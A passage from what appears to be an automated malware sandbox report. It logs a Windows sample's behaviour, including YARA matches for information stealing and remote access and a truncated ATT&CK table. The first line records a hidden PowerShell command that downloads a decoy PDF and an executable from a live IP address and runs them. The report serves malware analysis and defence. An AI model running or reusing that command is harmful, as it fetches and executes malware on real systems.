                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -outfile "$env:temp\readme.pdf" ; start-process 'msedge.exe' -argumentlist \"--kiosk $env:temp\readme.pdf\" ; iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -outfile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_0079CDD5 cpuid 26_3_0079CDD5
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,19_2_004C9670
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,26_2_004C9670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,19_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,19_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004CB0E0 GetVersionExA,19_2_004CB0E0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0000001A.00000003.2118974534.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2129262237.0000000000CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2123513002.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2231344124.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0000001A.00000003.2118974534.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2129262237.0000000000CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2123513002.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2231344124.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts11
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Disable or Modify Tools
                      21
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      11
